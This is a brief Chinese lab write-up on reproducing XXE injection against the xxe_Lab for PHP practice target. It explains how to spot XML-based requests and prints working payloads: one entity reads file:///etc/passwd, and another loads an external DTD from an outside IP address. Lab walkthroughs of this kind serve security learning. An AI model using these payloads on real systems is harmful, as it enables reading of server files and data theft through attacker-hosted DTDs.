XXE
漏洞复现
XXE读文件
-
打开xxe_Lab for PHP的靶场,抓包。
-
判断是否有XXE注入漏洞
1、判定是否使用了xml进行数据传递
标签、Accept: application/xml, text/xml
2、确定是否有回显位置,或无回显,下图有回显。
-
写入payload。
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY[ <!ENTITY a SYSTEM "file:///etc/passwd"> ]>
-
另一种情况是外部参数实体。
<!ENTITY xxe SYSTEM "file:///etc/passwd">
-
http服务
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY[ <!ENTITY % a SYSTEM "http://47.113.187.190:90/wai.dtd"> %a; ]> <user><username> &xxe; </username><password>222</password></user>
-
原创2023年3月28日大约 5 分钟